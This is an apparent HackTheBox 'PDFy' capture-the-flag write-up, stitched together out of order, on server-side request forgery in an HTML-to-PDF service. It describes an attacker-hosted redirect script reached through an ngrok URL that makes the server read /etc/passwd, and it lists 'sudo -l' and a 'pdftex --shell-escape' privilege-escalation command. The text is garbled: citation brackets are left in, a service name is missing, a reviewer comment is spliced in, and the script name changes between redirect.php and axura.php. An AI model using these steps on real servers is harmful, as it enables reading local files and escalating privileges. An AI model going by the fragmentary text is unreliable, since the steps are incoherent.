PDFy HTB Writeup
tool is known to be vulnerable to SSRF if it renders user-controlled HTML or follows redirects to local files [1, 26].

: Read the /etc/passwd file to find the flag [13, 14].

The Technique: Since direct file paths (like file:///etc/passwd) may be blocked by a basic filter, you can use a PHP redirect script hosted on your own server (or a service like ) [1, 11].

redirect.php
"url": "http://0.tcp.us-cal-1.ngrok.io:19086/index.html"
Interacting with the application web page reveals a single input form requiring a URL. Submitting a legitimate external site (like http://google.com) successfully triggers the application to query the destination and serve a valid HTML layout inside a rendered PDF file.

2. Testing for Direct Local Restrictions
Create a file named index.html in the root of your local web server's directory.
The writeup could use more screenshots of the web interface, especially the PDF upload/generation page. A few diagrams of the privilege escalation flow would also help visual learners.
sudo -l
The server processes the request. It fetches our index.html, which contains the <iframe> pointing to our axura.php script. The server then fetches our script and receives a redirect to file:///etc/passwd. Finally, it retrieves the contents of the local password file and renders them into a PDF.
sudo /usr/bin/pdftex --shell-escape